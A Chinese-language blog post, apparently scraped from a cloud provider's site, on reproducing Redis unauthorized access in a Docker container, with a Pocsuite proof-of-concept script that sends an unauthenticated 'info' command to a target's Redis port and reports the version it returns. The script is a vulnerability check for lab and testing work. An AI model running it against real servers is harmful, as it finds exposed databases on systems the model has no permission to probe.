標籤:time known red ofo gis success sea else res
docker搜尋Redis鏡像docker search redisdocker pull redisdocker imagesdocker run -p 6379:6379 -d redis-p 將容器的6379連接埠映射到主機的6379連接埠。
-d 將容器後台運行。
docker ps#!/usr/bin/env python# -*- coding: utf-8 -*-import socketfrom pocsuite.utils import registerfrom pocsuite.poc import Output, POCBaseclass TestPOC(POCBase): vulID = ‘0‘ version = ‘1‘ author = ‘nw01f‘ vulDate = ‘2018-10-23‘ createDate = ‘2018-10-23‘ updateDate = ‘2018-10-23‘ references = [‘http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/‘] name = ‘Redis Unauthorized‘ appPowerLink = ‘https://www.redis.io‘ appName = ‘Redis‘ appVersion = ‘All‘ vulType = ‘Unauthorized‘ desc = ‘‘‘ redis Unauthorized ‘‘‘ samples = [‘‘] def _verify(self): result = {} payload = ‘\x69\x6e\x66\x6f\x0d\x0a‘ ## info/r/n s = socket.socket() socket.setdefaulttimeout(4) try: host = self.url.split(‘:‘)[1].strip(‘/‘) if len(self.url.split(‘:‘)) > 2: port = int(self.url.split(‘:‘)[2].strip(‘/‘)) else: port = 6379 s.connect((host, port)) s.send(payload) data = s.recv(1024) if data and ‘redis_version‘ in data: result[‘VerifyInfo‘] = {} result[‘VerifyInfo‘][‘url‘] = self.url result[‘VerifyInfo‘][‘port‘] = port result[‘VerifyInfo‘][‘result‘] = data[:20] except Exception as e: print e s.close() return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("error") return outputregister(TestPOC)http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
Redis未授權訪問docker複現
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
